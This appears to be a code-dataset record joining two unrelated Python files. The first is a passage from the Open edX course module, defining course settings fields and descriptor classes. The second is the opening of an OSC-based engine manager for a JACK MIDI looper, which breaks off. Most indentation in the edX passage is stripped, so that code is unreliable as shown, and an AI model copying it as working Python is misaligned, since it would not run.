# his students.
display_name=_("Enable CCX"),
help=_(
# Translators: Custom Courses for edX (CCX) is an edX feature for re-using course content. CCX Coach is
# a role created by a course Instructor to enable a person (the "Coach") to manage the custom course for
# his students.
"Allow course instructors to assign CCX Coach roles, and allow coaches to manage Custom Courses on edX."
" When false, Custom Courses cannot be created, but existing Custom Courses will be preserved."
),
default=False,
scope=Scope.settings
)
ccx_connector = String(
# Translators: Custom Courses for edX (CCX) is an edX feature for re-using course content.
display_name=_("CCX Connector URL"),
# Translators: Custom Courses for edX (CCX) is an edX feature for re-using course content.
help=_(
"URL for CCX Connector application for managing creation of CCXs. (optional)."
" Ignored unless 'Enable CCX' is set to 'true'."
),
scope=Scope.settings, default=""
)
allow_anonymous = Boolean(
display_name=_("Allow Anonymous Discussion Posts"),
help=_("Enter true or false. If true, students can create discussion posts that are anonymous to all users."),
scope=Scope.settings, default=True
)
allow_anonymous_to_peers = Boolean(
display_name=_("Allow Anonymous Discussion Posts to Peers"),
help=_(
"Enter true or false. If true, students can create discussion posts that are anonymous to other "
"students. This setting does not make posts anonymous to course staff."
),
scope=Scope.settings, default=False
)
advanced_modules = List(
display_name=_("Advanced Module List"),
help=_("Enter the names of the advanced components to use in your course."),
scope=Scope.settings
)
has_children = True
info_sidebar_name = String(
display_name=_("Course Home Sidebar Name"),
help=_(
"Enter the heading that you want students to see above your course handouts on the Course Home page. "
"Your course handouts appear in the right panel of the page."
),
scope=Scope.settings, default=_('Course Handouts'))
show_timezone = Boolean(
help=_(
"True if timezones should be shown on dates in the courseware. "
"Deprecated in favor of due_date_display_format."
),
scope=Scope.settings, default=True
)
due_date_display_format = String(
display_name=_("Due Date Display Format"),
help=_(
"Enter the format for due dates. The default is Mon DD, YYYY. Enter \"%m-%d-%Y\" for MM-DD-YYYY, "
"\"%d-%m-%Y\" for DD-MM-YYYY, \"%Y-%m-%d\" for YYYY-MM-DD, or \"%Y-%d-%m\" for YYYY-DD-MM."
),
scope=Scope.settings, default=None
)
enrollment_domain = String(
display_name=_("External Login Domain"),
help=_("Enter the external login method students can use for the course."),
scope=Scope.settings
)
certificates_show_before_end = Boolean(
display_name=_("Certificates Downloadable Before End"),
help=_(
"Enter true or false. If true, students can download certificates before the course ends, if they've "
"met certificate requirements."
),
scope=Scope.settings,
default=False,
deprecated=True
)
certificates_display_behavior = String(
display_name=_("Certificates Display Behavior"),
help=_(
"Enter end, early_with_info, or early_no_info. After certificate generation, students who passed see a "
"link to their certificates on the dashboard and students who did not pass see information about the "
"grading configuration. The default is end, which displays this certificate information to all students "
"after the course end date. To display this certificate information to all students as soon as "
"certificates are generated, enter early_with_info. To display only the links to passing students as "
"soon as certificates are generated, enter early_no_info."
),
scope=Scope.settings,
default="end"
)
course_image = String(
display_name=_("Course About Page Image"),
help=_(
"Edit the name of the course image file. You must upload this file on the Files & Uploads page. "
"You can also set the course image on the Settings & Details page."
),
scope=Scope.settings,
# Ensure that courses imported from XML keep their image
default="images_course_image.jpg"
)
issue_badges = Boolean(
display_name=_("Issue Open Badges"),
help=_(
"Issue Open Badges badges for this course. Badges are generated when certificates are created."
),
scope=Scope.settings,
default=True
)
## Course level Certificate Name overrides.
cert_name_short = String(
help=_(
'Use this setting only when generating PDF certificates. '
'Between quotation marks, enter the short name of the type of certificate that '
'students receive when they complete the course. For instance, "Certificate".'
),
display_name=_("Certificate Name (Short)"),
scope=Scope.settings,
default=""
)
cert_name_long = String(
help=_(
'Use this setting only when generating PDF certificates. '
'Between quotation marks, enter the long name of the type of certificate that students '
'receive when they complete the course. For instance, "Certificate of Achievement".'
),
display_name=_("Certificate Name (Long)"),
scope=Scope.settings,
default=""
)
cert_html_view_enabled = Boolean(
display_name=_("Certificate Web/HTML View Enabled"),
help=_("If true, certificate Web/HTML views are enabled for the course."),
scope=Scope.settings,
default=False,
)
cert_html_view_overrides = Dict(
        # Translators: This field is the container for course-specific certificate configuration values
display_name=_("Certificate Web/HTML View Overrides"),
# Translators: These overrides allow for an alternative configuration of the certificate web view
help=_("Enter course-specific overrides for the Web/HTML template parameters here (JSON format)"),
scope=Scope.settings,
)
# Specific certificate information managed via Studio (should eventually fold other cert settings into this)
certificates = Dict(
        # Translators: This field is the container for course-specific certificate configuration values
display_name=_("Certificate Configuration"),
# Translators: These overrides allow for an alternative configuration of the certificate web view
help=_("Enter course-specific configuration information here (JSON format)"),
scope=Scope.settings,
)
# An extra property is used rather than the wiki_slug/number because
# there are courses that change the number for different runs. This allows
# courses to share the same css_class across runs even if they have
# different numbers.
#
# TODO get rid of this as soon as possible or potentially build in a robust
# way to add in course-specific styling. There needs to be a discussion
# about the right way to do this, but arjun will address this ASAP. Also
# note that the courseware template needs to change when this is removed.
css_class = String(
display_name=_("CSS Class for Course Reruns"),
help=_("Allows courses to share the same css class across runs even if they have different numbers."),
scope=Scope.settings, default="",
deprecated=True
)
# TODO: This is a quick kludge to allow CS50 (and other courses) to
# specify their own discussion forums as external links by specifying a
# "discussion_link" in their policy JSON file. This should later get
# folded in with Syllabus, Course Info, and additional Custom tabs in a
# more sensible framework later.
discussion_link = String(
display_name=_("Discussion Forum External Link"),
help=_("Allows specification of an external link to replace discussion forums."),
scope=Scope.settings,
deprecated=True
)
# TODO: same as above, intended to let internal CS50 hide the progress tab
# until we get grade integration set up.
# Explicit comparison to True because we always want to return a bool.
hide_progress_tab = Boolean(
display_name=_("Hide Progress Tab"),
help=_("Allows hiding of the progress tab."),
scope=Scope.settings,
deprecated=True
)
display_organization = String(
display_name=_("Course Organization Display String"),
help=_(
"Enter the course organization that you want to appear in the courseware. This setting overrides the "
"organization that you entered when you created the course. To use the organization that you entered "
"when you created the course, enter null."
),
scope=Scope.settings
)
display_coursenumber = String(
display_name=_("Course Number Display String"),
help=_(
"Enter the course number that you want to appear in the courseware. This setting overrides the course "
"number that you entered when you created the course. To use the course number that you entered when "
"you created the course, enter null."
),
scope=Scope.settings,
default=""
)
max_student_enrollments_allowed = Integer(
display_name=_("Course Maximum Student Enrollment"),
help=_(
"Enter the maximum number of students that can enroll in the course. To allow an unlimited number of "
"students, enter null."
),
scope=Scope.settings
)
allow_public_wiki_access = Boolean(
display_name=_("Allow Public Wiki Access"),
help=_(
"Enter true or false. If true, edX users can view the course wiki even "
"if they're not enrolled in the course."
),
default=False,
scope=Scope.settings
)
invitation_only = Boolean(
display_name=_("Invitation Only"),
help=_("Whether to restrict enrollment to invitation by the course staff."),
default=False,
scope=Scope.settings
)
course_survey_name = String(
display_name=_("Pre-Course Survey Name"),
help=_("Name of SurveyForm to display as a pre-course survey to the user."),
default=None,
scope=Scope.settings,
deprecated=True
)
course_survey_required = Boolean(
display_name=_("Pre-Course Survey Required"),
help=_(
"Specify whether students must complete a survey before they can view your course content. If you "
"set this value to true, you must add a name for the survey to the Course Survey Name setting above."
),
default=False,
scope=Scope.settings,
deprecated=True
)
catalog_visibility = String(
display_name=_("Course Visibility In Catalog"),
help=_(
"Defines the access permissions for showing the course in the course catalog. This can be set to one "
"of three values: 'both' (show in catalog and allow access to about page), 'about' (only allow access "
"to about page), 'none' (do not show in catalog and do not allow access to an about page)."
),
default=CATALOG_VISIBILITY_CATALOG_AND_ABOUT,
scope=Scope.settings,
values=[
{"display_name": _("Both"), "value": CATALOG_VISIBILITY_CATALOG_AND_ABOUT},
{"display_name": _("About"), "value": CATALOG_VISIBILITY_ABOUT},
{"display_name": _("None"), "value": CATALOG_VISIBILITY_NONE}]
)
entrance_exam_enabled = Boolean(
display_name=_("Entrance Exam Enabled"),
help=_(
"Specify whether students must complete an entrance exam before they can view your course content. "
"Note, you must enable Entrance Exams for this course setting to take effect."
),
default=False,
scope=Scope.settings,
)
entrance_exam_minimum_score_pct = Float(
display_name=_("Entrance Exam Minimum Score (%)"),
help=_(
"Specify a minimum percentage score for an entrance exam before students can view your course content. "
"Note, you must enable Entrance Exams for this course setting to take effect."
),
default=65,
scope=Scope.settings,
)
entrance_exam_id = String(
display_name=_("Entrance Exam ID"),
help=_("Content module identifier (location) of entrance exam."),
default=None,
scope=Scope.settings,
)
social_sharing_url = String(
display_name=_("Social Media Sharing URL"),
help=_(
"If dashboard social sharing and custom course URLs are enabled, you can provide a URL "
"(such as the URL to a course About page) that social media sites can link to. URLs must "
"be fully qualified. For example: http://www.edx.org/course/Introduction-to-MOOCs-ITM001"
),
default=None,
scope=Scope.settings,
)
language = String(
display_name=_("Course Language"),
help=_("Specify the language of your course."),
default=None,
scope=Scope.settings
)
teams_configuration = Dict(
display_name=_("Teams Configuration"),
# Translators: please don't translate "id".
help=_(
'Specify the maximum team size and topics for teams inside the provided set of curly braces. '
'Make sure that you enclose all of the sets of topic values within a set of square brackets, '
'with a comma after the closing curly brace for each topic, and another comma after the '
'closing square brackets. '
'For example, to specify that teams should have a maximum of 5 participants and provide a list of '
'2 topics, enter the configuration in this format: {example_format}. '
'In "id" values, the only supported special characters are underscore, hyphen, and period.'
).format(
# Put the sample JSON into a format variable so that translators
# don't muck with it.
example_format=(
'{"topics": [{"name": "Topic1Name", "description": "Topic1Description", "id": "Topic1ID"}, '
'{"name": "Topic2Name", "description": "Topic2Description", "id": "Topic2ID"}], "max_team_size": 5}'
),
),
scope=Scope.settings,
)
enable_proctored_exams = Boolean(
display_name=_("Enable Proctored Exams"),
help=_(
"Enter true or false. If this value is true, proctored exams are enabled in your course. "
"Note that enabling proctored exams will also enable timed exams."
),
default=False,
scope=Scope.settings
)
enable_timed_exams = Boolean(
display_name=_("Enable Timed Exams"),
help=_(
"Enter true or false. If this value is true, timed exams are enabled in your course."
),
default=False,
scope=Scope.settings
)
minimum_grade_credit = Float(
display_name=_("Minimum Grade for Credit"),
help=_(
"The minimum grade that a learner must earn to receive credit in the course, "
"as a decimal between 0.0 and 1.0. For example, for 75%, enter 0.75."
),
default=0.8,
scope=Scope.settings,
)
self_paced = Boolean(
display_name=_("Self Paced"),
help=_(
"Set this to \"true\" to mark this course as self-paced. Self-paced courses do not have "
"due dates for assignments, and students can progress through the course at any rate before "
"the course ends."
),
default=False,
scope=Scope.settings
)
enable_subsection_gating = Boolean(
display_name=_("Enable Subsection Prerequisites"),
help=_(
"Enter true or false. If this value is true, you can hide a "
"subsection until learners earn a minimum score in another, "
"prerequisite subsection."
),
default=False,
scope=Scope.settings
)
class CourseModule(CourseFields, SequenceModule): # pylint: disable=abstract-method
"""
The CourseDescriptor needs its module_class to be a SequenceModule, but some code that
expects a CourseDescriptor to have all its fields can fail if it gets a SequenceModule instead.
This class is to make sure that all the fields are present in all cases.
"""
class CourseDescriptor(CourseFields, SequenceDescriptor, LicenseMixin):
"""
The descriptor for the course XModule
"""
module_class = CourseModule
def __init__(self, *args, **kwargs):
"""
Expects the same arguments as XModuleDescriptor.__init__
"""
super(CourseDescriptor, self).__init__(*args, **kwargs)
_ = self.runtime.service(self, "i18n").ugettext
self._gating_prerequisites = None
if self.wiki_slug is None:
self.wiki_slug = self.location.course
if self.due_date_display_format is None and self.show_timezone is False:
# For existing courses with show_timezone set to False (and no due_date_display_format specified),
# set the due_date_display_format to what would have been shown previously (with no timezone).
# Then remove show_timezone so that if the user clears out the due_date_display_format,
# they get the default date display.
self.due_date_display_format = "DATE_TIME"
del self.show_timezone
# NOTE: relies on the modulestore to call set_grading_policy() right after
# init. (Modulestore is in charge of figuring out where to load the policy from)
# NOTE (THK): This is a last-minute addition for Fall 2012 launch to dynamically
# disable the syllabus content for courses that do not provide a syllabus
if self.system.resources_fs is None:
self.syllabus_present = False
else:
self.syllabus_present = self.system.resources_fs.exists(path('syllabus'))
self._grading_policy = {}
self.set_grading_policy(self.grading_policy)
if self.discussion_topics == {}:
self.discussion_topics = {_('General'): {'id': self.location.html_id()}}
try:
if not getattr(self, "tabs", []):
CourseTabList.initialize_default(self)
except InvalidTabsException as err:
raise type(err)('{msg} For course: {course_id}'.format(msg=err.message, course_id=unicode(self.id)))
def set_grading_policy(self, course_policy):
"""
The JSON object can have the keys GRADER and GRADE_CUTOFFS. If either is
missing, it reverts to the default.
"""
if course_policy is None:
course_policy = {}
# Load the global settings as a dictionary
grading_policy = self.grading_policy
# BOY DO I HATE THIS grading_policy CODE ACROBATICS YET HERE I ADD MORE (dhm)--this fixes things persisted w/
# defective grading policy values (but not None)
if 'GRADER' not in grading_policy:
grading_policy['GRADER'] = CourseFields.grading_policy.default['GRADER']
if 'GRADE_CUTOFFS' not in grading_policy:
grading_policy['GRADE_CUTOFFS'] = CourseFields.grading_policy.default['GRADE_CUTOFFS']
# Override any global settings with the course settings
grading_policy.update(course_policy)
# Here is where we should parse any configurations, so that we can fail early
# Use setters so that side effecting to .definitions works
self.raw_grader = grading_policy['GRADER'] # used for cms access
self.grade_cutoffs = grading_policy['GRADE_CUTOFFS']
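    # Example policy override (illustrative values only); any key omitted here
    # falls back to the CourseFields.grading_policy default:
    #
    #   course.set_grading_policy({
    #       "GRADER": [{"type": "Homework", "min_count": 10,
    #                   "drop_count": 1, "weight": 1.0}],
    #       "GRADE_CUTOFFS": {"Pass": 0.6},
    #   })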
@classmethod
def read_grading_policy(cls, paths, system):
"""Load a grading policy from the specified paths, in order, if it exists."""
# Default to a blank policy dict
policy_str = '{}'
for policy_path in paths:
if not system.resources_fs.exists(policy_path):
continue
log.debug("Loading grading policy from {0}".format(policy_path))
try:
with system.resources_fs.open(policy_path) as grading_policy_file:
policy_str = grading_policy_file.read()
# if we successfully read the file, stop looking at backups
break
except IOError:
msg = "Unable to load course settings file from '{0}'".format(policy_path)
log.warning(msg)
return policy_str
@classmethod
def from_xml(cls, xml_data, system, id_generator):
instance = super(CourseDescriptor, cls).from_xml(xml_data, system, id_generator)
# bleh, have to parse the XML here to just pull out the url_name attribute
# I don't think it's stored anywhere in the instance.
course_file = StringIO(xml_data.encode('ascii', 'ignore'))
xml_obj = etree.parse(course_file, parser=edx_xml_parser).getroot()
policy_dir = None
url_name = xml_obj.get('url_name', xml_obj.get('slug'))
if url_name:
policy_dir = 'policies/' + url_name
# Try to load grading policy
paths = ['grading_policy.json']
if policy_dir:
paths = [policy_dir + '/grading_policy.json'] + paths
try:
policy = json.loads(cls.read_grading_policy(paths, system))
except ValueError:
system.error_tracker("Unable to decode grading policy as json")
policy = {}
# now set the current instance. set_grading_policy() will apply some inheritance rules
instance.set_grading_policy(policy)
return instance
@classmethod
def definition_from_xml(cls, xml_object, system):
textbooks = []
for textbook in xml_object.findall("textbook"):
textbooks.append((textbook.get('title'), textbook.get('book_url')))
xml_object.remove(textbook)
# Load the wiki tag if it exists
wiki_slug = None
wiki_tag = xml_object.find("wiki")
if wiki_tag is not None:
wiki_slug = wiki_tag.attrib.get("slug", default=None)
xml_object.remove(wiki_tag)
definition, children = super(CourseDescriptor, cls).definition_from_xml(xml_object, system)
definition['textbooks'] = textbooks
definition['wiki_slug'] = wiki_slug
# load license if it exists
definition = LicenseMixin.parse_license_from_xml(definition, xml_object)
return definition, children
def definition_to_xml(self, resource_fs):
xml_object = super(CourseDescriptor, self).definition_to_xml(resource_fs)
        if len(self.textbooks) > 0:
            # Serialize each textbook as its own <textbook> element so that
            # definition_from_xml (which reads all "textbook" elements) can
            # round-trip the full list, not just the last entry.
            for textbook in self.textbooks:
                textbook_xml_object = etree.Element('textbook')
                textbook_xml_object.set('title', textbook.title)
                textbook_xml_object.set('book_url', textbook.book_url)
                xml_object.append(textbook_xml_object)
if self.wiki_slug is not None:
wiki_xml_object = etree.Element('wiki')
wiki_xml_object.set('slug', self.wiki_slug)
xml_object.append(wiki_xml_object)
# handle license specifically. Default the course to have a license
# of "All Rights Reserved", if a license is not explicitly set.
self.add_license_to_xml(xml_object, default="all-rights-reserved")
return xml_object
def has_ended(self):
"""
Returns True if the current time is after the specified course end date.
Returns False if there is no end date specified.
"""
return course_metadata_utils.has_course_ended(self.end)
def may_certify(self):
"""
Return whether it is acceptable to show the student a certificate download link.
"""
return course_metadata_utils.may_certify_for_course(
self.certificates_display_behavior,
self.certificates_show_before_end,
self.has_ended()
)
def has_started(self):
return course_metadata_utils.has_course_started(self.start)
@property
def grader(self):
return grader_from_conf(self.raw_grader)
@property
def raw_grader(self):
# force the caching of the xblock value so that it can detect the change
# pylint: disable=pointless-statement
self.grading_policy['GRADER']
return self._grading_policy['RAW_GRADER']
@raw_grader.setter
def raw_grader(self, value):
# NOTE WELL: this change will not update the processed graders. If we need that, this needs to call grader_from_conf
self._grading_policy['RAW_GRADER'] = value
self.grading_policy['GRADER'] = value
@property
def grade_cutoffs(self):
return self._grading_policy['GRADE_CUTOFFS']
@grade_cutoffs.setter
def grade_cutoffs(self, value):
self._grading_policy['GRADE_CUTOFFS'] = value
# XBlock fields don't update after mutation
policy = self.grading_policy
policy['GRADE_CUTOFFS'] = value
self.grading_policy = policy
@property
def lowest_passing_grade(self):
return min(self._grading_policy['GRADE_CUTOFFS'].values())
@property
def is_cohorted(self):
"""
Return whether the course is cohorted.
Note: No longer used. See openedx.core.djangoapps.course_groups.models.CourseCohortSettings.
"""
config = self.cohort_config
if config is None:
return False
return bool(config.get("cohorted"))
@property
def auto_cohort(self):
"""
Return whether the course is auto-cohorted.
Note: No longer used. See openedx.core.djangoapps.course_groups.models.CourseCohortSettings.
"""
if not self.is_cohorted:
return False
return bool(self.cohort_config.get(
"auto_cohort", False))
@property
def auto_cohort_groups(self):
"""
Return the list of groups to put students into. Returns [] if not
specified. Returns specified list even if is_cohorted and/or auto_cohort are
false.
Note: No longer used. See openedx.core.djangoapps.course_groups.models.CourseCohortSettings.
"""
if self.cohort_config is None:
return []
else:
return self.cohort_config.get("auto_cohort_groups", [])
@property
def top_level_discussion_topic_ids(self):
"""
Return list of topic ids defined in course policy.
"""
topics = self.discussion_topics
return [d["id"] for d in topics.values()]
@property
def cohorted_discussions(self):
"""
Return the set of discussions that is explicitly cohorted. It may be
the empty set. Note that all inline discussions are automatically
cohorted based on the course's is_cohorted setting.
Note: No longer used. See openedx.core.djangoapps.course_groups.models.CourseCohortSettings.
"""
config = self.cohort_config
if config is None:
return set()
return set(config.get("cohorted_discussions", []))
@property
def always_cohort_inline_discussions(self):
"""
This allow to change the default behavior of inline discussions cohorting. By
setting this to False, all inline discussions are non-cohorted unless their
ids are specified in cohorted_discussions.
Note: No longer used. See openedx.core.djangoapps.course_groups.models.CourseCohortSettings.
"""
config = self.cohort_config
if config is None:
return True
return bool(config.get("always_cohort_inline_discussions", True))
@property
def is_newish(self):
"""
        Returns whether the course has been flagged as new. If
        there is no flag, returns a heuristic value based on the
        announcement and start dates.
"""
flag = self.is_new
if flag is None:
# Use a heuristic if the course has not been flagged
announcement, start, now = course_metadata_utils.sorting_dates(
self.start, self.advertised_start, self.announcement
)
if announcement and (now - announcement).days < 30:
                # The course has been announced for less than a month
return True
elif (now - start).days < 1:
# The course has not started yet
return True
else:
return False
elif isinstance(flag, basestring):
return flag.lower() in ['true', 'yes', 'y']
else:
return bool(flag)
@property
def sorting_score(self):
"""
        Returns a tuple that can be used to sort the courses according
        to how "new" they are. The "newness" score is computed using a
heuristic that takes into account the announcement and
(advertised) start dates of the course if available.
The lower the number the "newer" the course.
"""
return course_metadata_utils.sorting_score(self.start, self.advertised_start, self.announcement)
@lazy
def grading_context(self):
"""
This returns a dictionary with keys necessary for quickly grading
a student. They are used by grades.grade()
The grading context has two keys:
graded_sections - This contains the sections that are graded, as
            well as all possible child modules that can affect the
            grading. This allows some sections to be skipped if the student
            hasn't seen any part of them.
The format is a dictionary keyed by section-type. The values are
arrays of dictionaries containing
"section_descriptor" : The section descriptor
"xmoduledescriptors" : An array of xmoduledescriptors that
could possibly be in the section, for any student
all_descriptors - This contains a list of all xmodules that can
            affect grading for a student. This is used to efficiently fetch
all the xmodule state for a FieldDataCache without walking
the descriptor tree again.
"""
# If this descriptor has been bound to a student, return the corresponding
# XModule. If not, just use the descriptor itself
try:
module = getattr(self, '_xmodule', None)
if not module:
module = self
except UndefinedContext:
module = self
def possibly_scored(usage_key):
"""Can this XBlock type can have a score or children?"""
return usage_key.block_type in self.block_types_affecting_grading
all_descriptors = []
graded_sections = {}
def yield_descriptor_descendents(module_descriptor):
for child in module_descriptor.get_children(usage_key_filter=possibly_scored):
yield child
for module_descriptor in yield_descriptor_descendents(child):
yield module_descriptor
for chapter in self.get_children():
for section in chapter.get_children():
if section.graded:
xmoduledescriptors = list(yield_descriptor_descendents(section))
xmoduledescriptors.append(section)
# The xmoduledescriptors included here are only the ones that have scores.
section_description = {
'section_descriptor': section,
'xmoduledescriptors': [child for child in xmoduledescriptors if child.has_score]
}
section_format = section.format if section.format is not None else ''
graded_sections[section_format] = graded_sections.get(section_format, []) + [section_description]
all_descriptors.extend(xmoduledescriptors)
all_descriptors.append(section)
return {'graded_sections': graded_sections,
'all_descriptors': all_descriptors, }
@lazy
def block_types_affecting_grading(self):
"""Return all block types that could impact grading (i.e. scored, or having children)."""
return frozenset(
cat for (cat, xblock_class) in XBlock.load_classes() if (
getattr(xblock_class, 'has_score', False) or getattr(xblock_class, 'has_children', False)
)
)
@staticmethod
def make_id(org, course, url_name):
return '/'.join([org, course, url_name])
@property
def id(self):
"""Return the course_id for this course"""
return self.location.course_key
def start_datetime_text(self, format_string="SHORT_DATE"):
"""
        Returns the desired text corresponding to the course's start date and time in UTC. Prefers .advertised_start,
then falls back to .start
"""
i18n = self.runtime.service(self, "i18n")
return course_metadata_utils.course_start_datetime_text(
self.start,
self.advertised_start,
format_string,
i18n.ugettext,
i18n.strftime
)
@property
def start_date_is_still_default(self):
"""
Checks if the start date set for the course is still default, i.e. .start has not been modified,
and .advertised_start has not been set.
"""
return course_metadata_utils.course_start_date_is_default(
self.start,
self.advertised_start
)
def end_datetime_text(self, format_string="SHORT_DATE"):
"""
Returns the end date or date_time for the course formatted as a string.
"""
return course_metadata_utils.course_end_datetime_text(
self.end,
format_string,
self.runtime.service(self, "i18n").strftime
)
def get_discussion_blackout_datetimes(self):
"""
Get a list of dicts with start and end fields with datetime values from
the discussion_blackouts setting
"""
date_proxy = Date()
try:
ret = [
{"start": date_proxy.from_json(start), "end": date_proxy.from_json(end)}
for start, end
in filter(None, self.discussion_blackouts)
]
for blackout in ret:
if not blackout["start"] or not blackout["end"]:
raise ValueError
return ret
except (TypeError, ValueError):
log.exception(
"Error parsing discussion_blackouts %s for course %s",
self.discussion_blackouts,
self.id
)
return []
@property
def forum_posts_allowed(self):
"""
Return whether forum posts are allowed by the discussion_blackouts
setting
"""
blackouts = self.get_discussion_blackout_datetimes()
now = datetime.now(UTC())
for blackout in blackouts:
if blackout["start"] <= now <= blackout["end"]:
return False
return True
@property
def number(self):
"""
Returns this course's number.
This is a "number" in the sense of the "course numbers" that you see at
lots of universities. For example, given a course
"Intro to Computer Science" with the course key "edX/CS-101/2014", the
course number would be "CS-101"
"""
return course_metadata_utils.number_for_course_location(self.location)
@property
def display_number_with_default(self):
"""
Return a display course number if it has been specified, otherwise return the 'course' that is in the location
"""
if self.display_coursenumber:
return self.display_coursenumber
return self.number
@property
def org(self):
return self.location.org
@property
def display_org_with_default(self):
"""
Return a display organization if it has been specified, otherwise return the 'org' that is in the location
"""
if self.display_organization:
return self.display_organization
return self.org
@property
def video_pipeline_configured(self):
"""
Returns whether the video pipeline advanced setting is configured for this course.
"""
return (
self.video_upload_pipeline is not None and
'course_video_upload_token' in self.video_upload_pipeline
)
def clean_id(self, padding_char='='):
"""
Returns a unique deterministic base32-encoded ID for the course.
The optional padding_char parameter allows you to override the "=" character used for padding.
"""
return course_metadata_utils.clean_course_key(self.location.course_key, padding_char)
@property
def teams_enabled(self):
"""
        Returns whether or not teams are enabled for this course.
Currently, teams are considered enabled when at least one topic has been configured for the course.
"""
if self.teams_configuration:
return len(self.teams_configuration.get('topics', [])) > 0
return False
@property
def teams_max_size(self):
"""
Returns the max size for teams if teams has been configured, else None.
"""
return self.teams_configuration.get('max_team_size', None)
@property
def teams_topics(self):
"""
Returns the topics that have been configured for teams for this course, else None.
"""
return self.teams_configuration.get('topics', None)
def get_user_partitions_for_scheme(self, scheme):
"""
Retrieve all user partitions defined in the course for a particular
partition scheme.
Arguments:
scheme (object): The user partition scheme.
Returns:
list of `UserPartition`
"""
return [
p for p in self.user_partitions
if p.scheme == scheme
]
def set_user_partitions_for_scheme(self, partitions, scheme):
"""
Set the user partitions for a particular scheme.
Preserves partitions associated with other schemes.
        Arguments:
            partitions (list of `UserPartition`): The partitions to set for this scheme.
            scheme (object): The user partition scheme.
"""
other_partitions = [
p for p in self.user_partitions # pylint: disable=access-member-before-definition
if p.scheme != scheme
]
self.user_partitions = other_partitions + partitions # pylint: disable=attribute-defined-outside-init
@property
def can_toggle_course_pacing(self):
"""
Whether or not the course can be set to self-paced at this time.
Returns:
bool: False if the course has already started, True otherwise.
"""
return datetime.now(UTC()) <= self.start
class CourseSummary(object):
"""
    A lightweight course summary class, which constructs a split/mongo course summary without
    loading the course. It is used in the CMS for listing courses to global staff users.
"""
course_info_fields = ['display_name', 'display_coursenumber', 'display_organization']
def __init__(self, course_locator, display_name=u"Empty", display_coursenumber=None, display_organization=None):
"""
Initialize and construct course summary
Arguments:
course_locator (CourseLocator): CourseLocator object of the course.
            display_name (unicode): display name of the course. When a course is created from the
                console, display_name isn't set (the course block has no `display_name` key), so
                "Empty" is used as the default display name when the course is loaded.
                display_name can also be set to None in the course's Advanced Settings; in that
                case "Empty" must not be substituted.
display_coursenumber (unicode|None): Course number that is specified & appears in the courseware
display_organization (unicode|None): Course organization that is specified & appears in the courseware
"""
self.display_coursenumber = display_coursenumber
self.display_organization = display_organization
self.display_name = display_name
self.id = course_locator # pylint: disable=invalid-name
self.location = course_locator.make_usage_key('course', 'course')
@property
def display_org_with_default(self):
"""
Return a display organization if it has been specified, otherwise return the 'org' that
is in the location
"""
if self.display_organization:
return self.display_organization
return self.location.org
@property
def display_number_with_default(self):
"""
Return a display course number if it has been specified, otherwise return the 'course' that
is in the location
"""
if self.display_coursenumber:
return self.display_coursenumber
return self.location.course
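# Usage sketch (hypothetical locator): CourseSummary mirrors the display
# properties of CourseDescriptor without loading the full course block.
#
#   summary = CourseSummary(course_locator, display_name=u"Demo Course",
#                           display_coursenumber=u"CS-101")
#   summary.display_number_with_default  # -> u"CS-101"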
| agpl-3.0 | 1,317,115,201,239,316,500 | 38.201797 | 124 | 0.613874 | false |
jtotto/sooper-jack-midi-looper | src/GUI/jack_midi_looper_gui/engine_manager.py | 1 | 10951 | # JACK MIDI LOOPER
# Copyright (C) 2014 Joshua Otto
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
import liblo
import logging
from jack_midi_looper_gui.models import MIDIMappingInfo
from jack_midi_looper_gui.subject import Subject
import subprocess
import threading
import time
class IEngineManager( Subject ):
"""Interface for the engine manager."""
def __init__( self ):
"""Constructs an engine manager with the given subscription keys."""
Subject.__init__( self )
self.add_key( "loops" )
self.add_key( "mappings" )
self.add_key( "shutdown" )
@staticmethod
def perform_notify( key, callback, data ):
"""
Implement the Subject's notify functionality.
There is NO guarantee that the provided callbacks will be invoked from the
same thread, so they should be written accordingly.
"""
if key == "shutdown":
callback()
else: # "loops", "mappings"
change_type, change_content = data
callback( change_type, change_content )
def initialize_subscribers( self ):
"""Retrieve the initial state of the engine."""
raise NotImplementedError
def cleanup( self ):
"""Wrap up interaction with the engine."""
raise NotImplementedError
def new_loop( self, name ):
"""
Requests that the engine create a new loop.
Args:
name (str): A string containing the name of the loop to be created.
Returns:
void
"""
raise NotImplementedError
def remove_loops( self, names ):
"""
Requests that the engine remove the given loops.
Args:
names (list[str]): A list of string names of loops to be removed.
Returns:
void
"""
raise NotImplementedError
def new_mapping( self, mapping_info ):
"""
Requests that the engine create a new MIDI mapping with the given
        characteristics.
Args:
mapping_info (MIDIMappingInfo): A MIDIMappingInfo object for the engine to create.
Returns:
void
"""
raise NotImplementedError
def remove_mappings( self, mapping_infos ):
"""
Requests that the engine remove all of the specified MIDI mappings.
Args:
mapping_infos (list[MIDIMappingInfo]): A list of MIDIMappingInfo objects
to be removed.
Returns:
void
"""
raise NotImplementedError
def IEngineManagerFactory( engine_port, engine_host, our_port, fail_on_not_found,
quit_on_shutdown ):
"""Simply construct an appropriate IEngineManager."""
return EngineManager( engine_port, engine_host, our_port, fail_on_not_found,
quit_on_shutdown )
class EngineManager( IEngineManager ):
"""Default implementation of engine management using OSC."""
def __init__( self, engine_port, engine_host, our_port, fail_on_not_found,
quit_on_shutdown ):
"""
Initialize by establishing communication with an existing engine, or
spawning a new one if required.
Args:
            engine_port (int): The port on which to communicate with the engine.
            engine_host (str): The host on which to look for the engine.
            our_port (int): The port on which our OSC server communicates, or
                None to let liblo choose one.
            fail_on_not_found (bool): If True, raise NoEngineError when the
                given engine does not respond, rather than spawning a new
                engine instance.
            quit_on_shutdown (bool): If True, ask the engine to quit when
                cleanup() is called; otherwise just unsubscribe from updates.
"""
IEngineManager.__init__( self )
self._quit_on_shutdown = quit_on_shutdown
try:
if our_port is None:
self._server_thread = liblo.ServerThread()
else:
self._server_thread = liblo.ServerThread( our_port )
except liblo.ServerError:
print( "Problem setting up OSC!" )
raise
self._server_thread.add_method( "/pingack", "ssi", self._pingack_callback )
self._server_thread.add_method(
"/loop/update", "ss", self._loop_change_callback )
self._server_thread.add_method(
"/mapping/update", "ss", self._mapping_change_callback )
self._server_thread.add_method(
